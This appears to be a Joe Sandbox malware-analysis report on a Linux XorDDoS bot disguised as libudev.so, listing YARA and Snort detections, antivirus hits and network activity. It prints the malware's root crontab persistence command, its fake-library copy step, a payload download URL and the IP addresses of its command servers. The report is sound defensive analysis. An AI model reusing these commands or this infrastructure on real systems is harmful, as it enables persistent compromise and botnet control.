6430.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6464.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6339.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6318.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6318.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6536.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6536.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6410.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6410.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: libudev.so PID: 6230	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6232	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6233	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6234	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6263	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6266	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6268	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6271	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6273	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6280	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6283	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6286	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6289	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6291	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6298	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6301	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6303	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6306	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6309	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6315	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6318	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6321	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6324	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6327	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6334	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6337	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6339	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6342	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6345	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6351	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6354	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6356	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6359	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6362	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6369	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6372	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6375	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6377	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6380	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6388	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6391	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6393	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6396	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6399	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6407	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6410	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6413	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6415	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6418	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6424	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6427	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6430	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6432	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6435	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6441	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6444	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6447	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6450	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6452	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6459	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6462	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6464	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6468	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6470	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6476	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6479	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6482	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: libudev.so PID: 6484	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Click to see the 237 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin via HTTP - Source IP: 192.168.2.23 - Destination IP: 54.36.15.99

Timestamp:	192.168.2.2354.36.15.9957652802021336 07/09/22-18:43:50.434118
SID:	2021336
Source Port:	57652
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.23 - Destination IP: 54.36.15.96

Timestamp:	192.168.2.2354.36.15.9645690532020381 07/09/22-18:43:50.618138
SID:	2020381
Source Port:	45690
Destination Port:	53
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: libudev.so

Avira: detected

Multi AV Scanner detection for submitted file

Source: libudev.so	Virustotal: Detection: 71%			Perma Link
Source: libudev.so	Metadefender: Detection: 64%			Perma Link
Source: libudev.so	ReversingLabs: Detection: 87%

Antivirus detection for dropped file

Source: /usr/bin/hfdnmorvjd	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/trcmbxxcta	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/mljnlxkfff	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ypclxoxcxk	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/fsqerkomug	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/jjfbelholv	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/cjrbrkowir	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ctwojuywol	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/bnuowhwlvc	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/chrcfbeejh	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /etc/init.d/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/uijxdyxaco	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/uhyqxsqece	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/tiupbsaswr	Avira: detection malicious, Label: LINUX/Xorddos.cona

Machine Learning detection for dropped file

Source: /usr/bin/hfdnmorvjd	Joe Sandbox ML: detected
Source: /usr/bin/trcmbxxcta	Joe Sandbox ML: detected
Source: /usr/bin/mljnlxkfff	Joe Sandbox ML: detected
Source: /usr/bin/ypclxoxcxk	Joe Sandbox ML: detected
Source: /usr/bin/fsqerkomug	Joe Sandbox ML: detected
Source: /usr/bin/jjfbelholv	Joe Sandbox ML: detected
Source: /usr/bin/cjrbrkowir	Joe Sandbox ML: detected
Source: /usr/bin/ctwojuywol	Joe Sandbox ML: detected
Source: /usr/bin/bnuowhwlvc	Joe Sandbox ML: detected
Source: /usr/bin/chrcfbeejh	Joe Sandbox ML: detected
Source: /etc/init.d/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/uijxdyxaco	Joe Sandbox ML: detected
Source: /usr/bin/uhyqxsqece	Joe Sandbox ML: detected
Source: /usr/bin/tiupbsaswr	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: libudev.so

Joe Sandbox ML: detected

Source: libudev.so

Malware Configuration Extractor: XorDDoS {"C2 list": []}

Source: /tmp/libudev.so (PID: 6231)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.23:57652 -> 54.36.15.99:80
Source: Traffic	Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:45690 -> 54.36.15.96:53

Source: global traffic	TCP traffic: 192.168.2.23:45690 -> 54.36.15.96:53
Source: global traffic	TCP traffic: 192.168.2.23:38648 -> 51.89.52.12:53

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.52.12
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: libudev.so, hfdnmorvjd.11.dr, trcmbxxcta.11.dr, mljnlxkfff.11.dr, ypclxoxcxk.11.dr, fsqerkomug.11.dr, jjfbelholv.11.dr, cjrbrkowir.11.dr, ctwojuywol.11.dr, bnuowhwlvc.11.dr, chrcfbeejh.11.dr, libudev.so0.11.dr, uijxdyxaco.11.dr, uhyqxsqece.11.dr, tiupbsaswr.11.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html
Source: libudev.so, 6230.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6232.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6233.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6234.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6263.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6266.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6268.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6271.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6273.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6280.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6283.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6286.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6289.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6291.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6298.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6301.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6303.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6306.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6309.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6315.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6318.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar
Source: libudev.so, 6230.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6232.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6233.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6234.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
Source: libudev.so, 6441.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6444.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6447.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6450.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6452.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bn
Source: libudev.so, 6459.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6462.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6464.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6468.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6470.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ch
Source: libudev.so, 6351.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6354.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6356.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6359.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6362.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cj
Source: libudev.so, 6315.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6318.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6321.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6324.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6327.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct
Source: libudev.so, 6530.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6533.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6536.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6539.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6541.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cu
Source: libudev.so, 6334.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6337.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6339.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6342.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6345.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9fs
Source: libudev.so, 6476.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6479.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6482.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6484.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6489.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hf
Source: libudev.so, 6512.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6515.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6517.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6520.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6523.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hr
Source: libudev.so, 6280.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6283.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6286.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6289.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6291.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jj
